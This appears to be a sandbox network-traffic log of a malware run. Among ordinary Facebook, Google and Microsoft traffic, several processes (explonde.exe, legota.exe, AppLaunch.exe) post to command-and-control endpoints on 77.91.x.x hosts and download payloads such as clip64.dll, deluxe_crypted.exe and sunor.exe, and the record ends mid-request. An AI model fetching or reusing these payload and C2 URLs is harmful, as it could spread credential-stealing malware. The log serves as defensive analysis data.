last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 17:11:39 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: NYd+Uk01TmG55EEFGdyPjA==
x-fb-debug: O5LPwCTFdYeWGEL7iPWRgfXLjAt49w454n0aFzlg9iTthxyj4WDuOhW2NwEswpWlX3pr6Ztu8naJ/cuqkiugnQ==
content-length: 20099
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/j3BMmuon6xg.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yE/r/j3BMmuon6xg.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 17:11:39 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: O7ZBfznX0G2ti2qHqp55lw==
x-fb-debug: aXRPo5aSVJZxLuOLts26u7q73UctzHYBE8w7kTJBYnDJEmaR9taHzlfW/J9ytx/r4ZbjnM2O4O5Sn1OKZ+LRjA==
content-length: 415
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/82PAamYR-V3.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yk/r/82PAamYR-V3.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 13 Sep 2024 20:01:37 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: 5SAHuizLvjSA+9eW/j6pPQ==
x-fb-debug: QJaNbB+BpFkRACeClki2kbfvnDpt51GwfrxiNsLJNdReMY1UqBE3EqikGWNYCo0FMoF3OYdBTVsmqmVeSnSXIQ==
content-length: 61681
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/Hy3nXo0ShbY.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yi/r/Hy3nXo0ShbY.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 14 Sep 2024 14:26:10 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: nztUlD03djGyvFNAqCFt6w==
x-fb-debug: 4174qG3OyQL+Rw6JxsGAdGozdFfQQP+cyEuBDoB2neFTOkS1XEBI7VNhyBk2TxhMCMJmJICPb05eZeErutS3pA==
content-length: 5769
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 12 Sep 2024 21:43:55 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: rMk140w2yQDsKH2j/WtwXg==
x-fb-debug: 3T63kNUyiPsYTJfkSuut3+7Tt5pKqIkiuQg6DTv2pfvhsDVNnEImakyyFkNhPy3hn1KcT2B+2I4CPHz92owXYg==
content-length: 9326
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/dZPMFj3nPTC.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yE/r/dZPMFj3nPTC.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 04 Sep 2024 20:51:28 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: W5jgcEXKioVMwlHFWJyajA==
x-fb-debug: aAYCTJyWDnaXfNUIUNbEJwK+hn+DXu8DbWRJ7zuSgZtsiGe/41g8wnU4sJFFg+9JsX4fiPL0206RVtKMCc+a4g==
content-length: 7497
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3iqES4/ys/l/en_US/vk9ztfbh-nf.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3iqES4/ys/l/en_US/vk9ztfbh-nf.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 15 Sep 2024 19:42:50 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: 3f6FjxpYGm3JPGVkako5Rg==
x-fb-debug: xczWKVYusUHJv0nMMDDhqfKPUwC+8c85YOdzkEcUbdIyBldm5r+1/R9cY9ZloOTcbgWRw1CLaG5KSVaMGZKWiw==
content-length: 13166
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yQ/r/iLrdFWqEA3q.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yQ/r/iLrdFWqEA3q.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 05 Sep 2024 00:43:36 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: FtKoSWsIGWUovj021Xkbow==
x-fb-debug: Vunmt7lYcxOoct0wjRqPLtoHKIZklYOyzixFAyTH9TSnB7DDhaBecut/GEFCaflWjj8OGCtd80HQ8qpF/4amPA==
content-length: 1787
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
DNS

facebook.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.196.35
GET

https://facebook.com/security/hsts-pixel.gif?c=3.2

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /security/hsts-pixel.gif?c=3.2 HTTP/2.0
host: facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 302

location: https://fbcdn.net/security/hsts-pixel.gif?c=2
cross-origin-opener-policy: same-origin-allow-popups
access-control-allow-origin: *
strict-transport-security: max-age=15552000; includeSubDomains
content-type: text/html; charset="utf-8"
x-fb-debug: 5iqW8o4mgtD92APB3UCoko43ivDWi/JOsJBZVRTdLgrH/dDwcf4m71aG/uU3Pk+18U78mPIXcKO+9mcx9jeCIw==
content-length: 0
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
DNS

fbcdn.net

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.196.35
GET

https://fbcdn.net/security/hsts-pixel.gif?c=2

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /security/hsts-pixel.gif?c=2 HTTP/2.0
host: fbcdn.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 302

location: https://fbsbx.com/security/hsts-pixel.gif
cross-origin-opener-policy: same-origin-allow-popups
access-control-allow-origin: *
strict-transport-security: max-age=31536000; preload; includeSubDomains
content-type: text/html; charset="utf-8"
x-fb-debug: YKxrR2pOST/Xn3Z8q1VscCHU7pQMVqa8RMwpwvGawsDHqI+iJ1otov9c0m8m1XyAioHXQuiH5upwvqcUZGDuMg==
content-length: 0
date: Mon, 18 Sep 2023 01:48:07 GMT
alt-svc: h3=":443"; ma=86400
DNS

15.196.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.196.240.157.in-addr.arpa

IN PTR

Response

15.196.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-02-mrs2fbcdnnet
DNS

fbsbx.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

157.240.196.35
GET

https://fbsbx.com/security/hsts-pixel.gif

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /security/hsts-pixel.gif HTTP/2.0
host: fbsbx.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: image/gif
content-security-policy: default-src data: blob: *.fbcdn.net *.fbsbx.com;script-src *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *.fbcdn.net *.fbsbx.com;connect-src *.fbcdn.net attachment.fbsbx.com blob: 'self' *.fbsbx.com;font-src *.fbsbx.com fbsbx.com *.fbcdn.net data:;img-src *.fbsbx.com *.fbcdn.net data: blob:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: *
strict-transport-security: max-age=31536000; preload; includeSubDomains
x-fb-debug: O+ZSUGO1w6AwisW7BeHJror6B2buEdj4+2iqrYaojIL3xkoBCazCHjm3r9bW1YFOy5gfIOJLY2lnLM7I9ILCuQ==
date: Mon, 18 Sep 2023 01:48:07 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico

MicrosoftEdge.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/yv/r/B8BxsscfVBr.ico HTTP/2.0
host: static.xx.fbcdn.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
dnt: 1

Response

HTTP/2.0 200

content-type: image/x-icon
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: 5Qjso+r8wfwtfxm6+yngaw==
expires: Mon, 16 Sep 2024 18:24:05 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
x-fb-debug: gbm7qbnemqwxvrcEyRcbhT975Rc9rylI9ashgnh/D+7hB3l0EW7tb61rHW1C3zXGk0CJCGN7cvVUfFz6lQPxSg==
content-length: 1150
date: Mon, 18 Sep 2023 01:48:10 GMT
alt-svc: h3=":443"; ma=86400
DNS

22.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.160.190.20.in-addr.arpa

IN PTR

Response
DNS

watson.telemetry.microsoft.com

Remote address:

8.8.8.8:53

Request

watson.telemetry.microsoft.com

IN A

Response

watson.telemetry.microsoft.com

IN CNAME

blobcollector.events.data.trafficmanager.net

blobcollector.events.data.trafficmanager.net

IN CNAME

onedsblobprdwus15.westus.cloudapp.azure.com

onedsblobprdwus15.westus.cloudapp.azure.com

IN A

20.189.173.20
POST

https://watson.telemetry.microsoft.com/Telemetry.Request

Remote address:

20.189.173.20:443

Request

POST /Telemetry.Request HTTP/1.1
Connection: Keep-Alive
User-Agent: MSDW
MSA_DeviceTicket: t=EwCwAlN5BAAUu1V9OkIAK55tj6h8OjaXgvkszYkAAVaBraE0hswHBbi7LvbARHY+Af5v8t5HYzW2zoZPzKID3xG6/GWW1w9lTM+k0VJQcaYn2xprn6hjwTnQ+dj78I6JTOhRz+l1K77XdWlJgq7nyec3+Mxn+xzfJE1iF8ZgO3vi9damx1sdJ8p7wWHagGR8S2VAEVny699S02dkoE9kNft438chgFRQ4kD6EgnUx7k+RyZ24HQKNGatWFSPTohsVpI9hpbnyywmVLlxDwgQw0K/oir8ubyEd9wYtq51SIBalPMoH3ikhV8dbF4vY1V3s7jfaDKCVPBMR86EOZR2HR+nBmcLAK4qQ7FAKUNYzGfi2ylJNnqwvmxQWyPYLWQDZgAACPzz8mTTRcU3gAEA1TrHnBEYXnH0ZEpYQKDcz+W7huB+CDijn25al+Ec3NcSWJysgjMdMYDMZU5bwKo7ROT65/nDn+oKx1JLSK+nxU2Qnk/KAPF2dx43DZNnztengWaIy4kB9CVex7UB3kJ5MNzmfvNZJLY3D68T/cvm2zNhZSMQIfBYCm6aHvv3aApMqYNoLxQqlTDbdCKIGZrCsVB5dQNxvR6kbSJExWW8AX3VHUxvYJOYSVF1eLj47HWu6YEsH1L+ZXoa7EU5Y999W8whKu1kys2VcnwFsAsHKYj9LzLf8gSKy31zJD/oC3EidO6Gbwrbfk/Ra+TI5n+SMxcyy63QsZoVIv3CdpfegnApJGJnxj09M5MZOF/DZzvJF01GECRby332wIOt3jvGFW1yDoy1qMSZcL7hEX2W+nhNBqadkc8Ngvfteeve8NHEw8HMVZH+cDIQV9frSQ6bNAt9nBI5Baw1++EBpTSPVeTekeFWnxHm2d/z32ulyxOeEWHZAWprUQ/vloCntFm2AQ==&p=
AAD_TenantId: (null)
Content-Length: 4623
Host: watson.telemetry.microsoft.com

Response

HTTP/1.1 200 200 OK

Content-Length: 741
Content-Type: text/xml
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
Date: Mon, 18 Sep 2023 01:48:11 GMT
DNS

20.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.173.189.20.in-addr.arpa

IN PTR

Response
GET

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhel2IOFstnzZBWuLx6rqjTm6mRC6t7PL5-k3BEI8hK8eaXqj3KTwQRYDdOsOfkNtopk8i0Tvw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-435455321%3A1695001685950698&theme=glif

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhel2IOFstnzZBWuLx6rqjTm6mRC6t7PL5-k3BEI8hK8eaXqj3KTwQRYDdOsOfkNtopk8i0Tvw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-435455321%3A1695001685950698&theme=glif HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:ExDJRuERE6HND8OYhetAJOEIhmu_rw:KTv1a75sNNk3TyBa

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
x-frame-options: DENY
set-cookie: __Host-GAPS=1:_baxT_rCmUwv_Yplo1yAjh66HwpbWQ:Xev5a7XA3mXcWKCs; Expires=Wed, 17-Sep-2025 01:48:13 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
x-ua-compatible: IE=edge
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 18 Sep 2023 01:48:13 GMT
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
cross-origin-resource-policy: same-site
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
POST

https://watson.telemetry.microsoft.com/Telemetry.Request

Remote address:

20.189.173.20:443

Request

POST /Telemetry.Request HTTP/1.1
Connection: Keep-Alive
User-Agent: MSDW
MSA_DeviceTicket: t=EwCwAlN5BAAUu1V9OkIAK55tj6h8OjaXgvkszYkAAVaBraE0hswHBbi7LvbARHY+Af5v8t5HYzW2zoZPzKID3xG6/GWW1w9lTM+k0VJQcaYn2xprn6hjwTnQ+dj78I6JTOhRz+l1K77XdWlJgq7nyec3+Mxn+xzfJE1iF8ZgO3vi9damx1sdJ8p7wWHagGR8S2VAEVny699S02dkoE9kNft438chgFRQ4kD6EgnUx7k+RyZ24HQKNGatWFSPTohsVpI9hpbnyywmVLlxDwgQw0K/oir8ubyEd9wYtq51SIBalPMoH3ikhV8dbF4vY1V3s7jfaDKCVPBMR86EOZR2HR+nBmcLAK4qQ7FAKUNYzGfi2ylJNnqwvmxQWyPYLWQDZgAACPzz8mTTRcU3gAEA1TrHnBEYXnH0ZEpYQKDcz+W7huB+CDijn25al+Ec3NcSWJysgjMdMYDMZU5bwKo7ROT65/nDn+oKx1JLSK+nxU2Qnk/KAPF2dx43DZNnztengWaIy4kB9CVex7UB3kJ5MNzmfvNZJLY3D68T/cvm2zNhZSMQIfBYCm6aHvv3aApMqYNoLxQqlTDbdCKIGZrCsVB5dQNxvR6kbSJExWW8AX3VHUxvYJOYSVF1eLj47HWu6YEsH1L+ZXoa7EU5Y999W8whKu1kys2VcnwFsAsHKYj9LzLf8gSKy31zJD/oC3EidO6Gbwrbfk/Ra+TI5n+SMxcyy63QsZoVIv3CdpfegnApJGJnxj09M5MZOF/DZzvJF01GECRby332wIOt3jvGFW1yDoy1qMSZcL7hEX2W+nhNBqadkc8Ngvfteeve8NHEw8HMVZH+cDIQV9frSQ6bNAt9nBI5Baw1++EBpTSPVeTekeFWnxHm2d/z32ulyxOeEWHZAWprUQ/vloCntFm2AQ==&p=
AAD_TenantId: (null)
Content-Length: 4623
Host: watson.telemetry.microsoft.com

Response

HTTP/1.1 200 200 OK

Content-Length: 741
Content-Type: text/xml
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
Date: Mon, 18 Sep 2023 01:48:15 GMT
DNS

200.81.21.72.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.81.21.72.in-addr.arpa

IN PTR

Response
DNS

84.65.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

84.65.42.20.in-addr.arpa

IN PTR

Response

77.91.68.52:80

http://77.91.68.52/mac/index.php

http

explonde.exe

510 B
365 B
6
5

HTTP Request

POST http://77.91.68.52/mac/index.php

HTTP Response

200
77.91.68.78:80

http://77.91.68.78/help/index.php

http

legota.exe

511 B
365 B
6
5

HTTP Request

POST http://77.91.68.78/help/index.php

HTTP Response

200
77.91.124.82:19071

AppLaunch.exe

156 B
3
77.91.68.29:80

http://77.91.68.29/fks/

http

1.4kB
848 B
9
9

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.124.231:80

156 B
3
77.91.124.82:19071

AppLaunch.exe

156 B
3
77.91.68.29:80

http://77.91.68.29/fks/

http

790 B
508 B
7
6

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.124.231:80

156 B
3
77.91.68.52:80

http://77.91.68.52/mac/Plugins/clip64.dll

http

explonde.exe

4.3kB
94.8kB
75
74

HTTP Request

GET http://77.91.68.52/mac/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.68.52/mac/Plugins/clip64.dll

HTTP Response

200
77.91.68.78:80

http://77.91.68.78/help/Plugins/clip64.dll

http

legota.exe

4.3kB
94.8kB
77
75

HTTP Request

GET http://77.91.68.78/help/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.68.78/help/Plugins/clip64.dll

HTTP Response

200
77.91.124.82:19071

AppLaunch.exe

156 B
3
77.91.68.29:80

http://77.91.68.29/fks/

http

6.8kB
6.1kB
33
29

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.68.78:80

http://77.91.68.78/lend/deluxe_crypted.exe

http

30.2kB
797.0kB
539
577

HTTP Request

GET http://77.91.68.78/lend/build.exe

HTTP Response

200

HTTP Request

GET http://77.91.68.78/lend/deluxe_crypted.exe

HTTP Response

200
77.91.68.61:80

http://77.91.68.61/fuza/2.bat

http

78.2kB
2.1MB
1414
1484

HTTP Request

GET http://77.91.68.61/fuza/sunor.exe

HTTP Response

200

HTTP Request

